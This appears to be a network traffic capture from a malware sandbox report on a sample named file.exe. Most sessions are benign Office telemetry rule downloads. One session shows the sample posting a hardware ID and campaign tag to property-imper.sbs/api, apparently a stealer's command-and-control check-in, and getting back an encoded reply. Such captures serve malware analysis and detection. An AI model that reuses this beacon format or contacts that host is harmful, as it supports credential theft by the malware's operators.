                                                                                                                                                                          2024-11-23 18:01:31 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          18192.168.2.54972613.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:31 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:31 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 467
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                          ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                          x-ms-request-id: 929cab26-201e-000c-4067-3d79c4000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180131Z-174c587ffdf4zw2thC1TEBu34000000003dg000000004usx
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:31 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          19192.168.2.54972813.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:33 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:33 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 407
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                          ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                          x-ms-request-id: 239436ba-d01e-0028-7bd5-3b7896000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180133Z-15b8b599d88wk8w4hC1TEB14b800000003c0000000004su9
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:33 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          20192.168.2.54973013.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:33 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:33 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 486
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                          ETag: "0x8DC582B9018290B"
                                                                                                                                                                          x-ms-request-id: 35b36372-301e-005d-408e-3be448000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180133Z-174c587ffdfl22mzhC1TEBk40c00000003cg00000000fsh2
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:33 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          21192.168.2.54973113.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:33 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:33 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 407
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                          ETag: "0x8DC582B9698189B"
                                                                                                                                                                          x-ms-request-id: d1e74057-c01e-0014-6563-3ba6a3000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180133Z-178bfbc474b9fdhphC1NYCac0n00000004tg0000000045c1
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:33 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          22192.168.2.54972713.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:33 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:33 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 486
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                          ETag: "0x8DC582BB344914B"
                                                                                                                                                                          x-ms-request-id: 9bcae678-901e-007b-2946-3cac50000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180133Z-15b8b599d88tmlzshC1TEB4xpn0000000360000000009dpd
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:33 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          23192.168.2.54972913.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:33 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:33 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:33 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 427
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                          ETag: "0x8DC582BA310DA18"
                                                                                                                                                                          x-ms-request-id: d33c8b0a-101e-00a2-48c7-3d9f2e000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180133Z-15b8b599d885ffrhhC1TEBtuv000000003c0000000007775
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          X-Cache-Info: L1_T2
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:33 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          24192.168.2.549732172.67.162.844437288C:\Users\user\Desktop\file.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:33 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                          Content-Length: 88
                                                                                                                                                                          Host: property-imper.sbs
                                                                                                                                                                          2024-11-23 18:01:33 UTC88OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 42 41 37 41 34 46 43 34 41 33 37 45 39 46 41 43 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32
                                                                                                                                                                          Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=BA7A4FC4A37E9FACD7CBBD6DF28D3732
                                                                                                                                                                          2024-11-23 18:01:34 UTC1013INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:34 GMT
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Set-Cookie: PHPSESSID=8f682osimg7m292e24v9bo9cvf; expires=Wed, 19-Mar-2025 11:48:13 GMT; Max-Age=9999999; path=/
                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=90BdaX%2Bj2MyxYV5x8MmKATyCo2lsLLWfxeaIilRCRVoPayIfkT5oqwha5eKAw7zP646RFe8Lc4Vo6E9SYekNyFt%2F3WWRi%2FDK1LH7oOK5EQDXhj1ulWWdK2IsSl2C3aGgJzyzvuk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 8e7310b4de2d41b4-EWR
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4802&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=990&delivery_rate=1661923&cwnd=214&unsent_bytes=0&cid=afd40917ddce65b4&ts=835&x=0"
                                                                                                                                                                          2024-11-23 18:01:34 UTC214INData Raw: 64 30 0d 0a 75 61 35 46 69 44 4c 59 75 62 32 6d 76 4e 2b 61 4a 6c 30 54 33 72 73 7a 52 45 42 62 59 30 73 6c 58 6a 49 51 39 6a 56 7a 32 71 62 69 31 57 66 39 45 4f 4b 62 31 64 4c 49 72 36 42 36 63 6b 2f 78 69 67 74 78 62 6d 6c 53 66 67 74 76 41 79 50 59 42 45 57 47 69 64 62 49 49 39 51 64 76 4e 7a 62 69 4e 6d 6e 2f 77 52 78 4d 62 6a 50 45 58 35 77 64 30 45 75 42 32 51 44 62 64 70 4f 55 61 2b 45 67 34 77 74 2f 45 61 6f 67 2b 47 4a 34 50 43 72 48 6d 67 39 37 49 6f 47 61 6e 46 71 55 47 55 55 61 47 34 2f 68 55 45 57 75 38 76 6c 67 54 66 70 58 4c 7a 57 30 49 6a 5a 70 2f 38 45 63 54 47 34 7a 78 46 2b 63 48 64 42 4c 67 64 6b 41 6d 32 72 0d 0a
                                                                                                                                                                          Data Ascii: d0ua5FiDLYub2mvN+aJl0T3rszREBbY0slXjIQ9jVz2qbi1Wf9EOKb1dLIr6B6ck/xigtxbmlSfgtvAyPYBEWGidbII9QdvNzbiNmn/wRxMbjPEX5wd0EuB2QDbdpOUa+Eg4wt/Eaog+GJ4PCrHmg97IoGanFqUGUUaG4/hUEWu8vlgTfpXLzW0IjZp/8EcTG4zxF+cHdBLgdkAm2r
                                                                                                                                                                          2024-11-23 18:01:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          25192.168.2.54973313.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:35 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:35 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 469
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                          ETag: "0x8DC582BBA701121"
                                                                                                                                                                          x-ms-request-id: d02e2b11-101e-00a2-2d3a-3c9f2e000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180135Z-178bfbc474bwh9gmhC1NYCy3rs00000004sg00000000ngtc
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:01:35 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          26192.168.2.54973513.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:35 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:36 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:35 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 477
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                          ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                          x-ms-request-id: 76a157b4-e01e-00aa-258c-3aceda000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180135Z-174c587ffdftjz9shC1TEBsh98000000034000000000d0wq
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache-Info: L1_T2
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
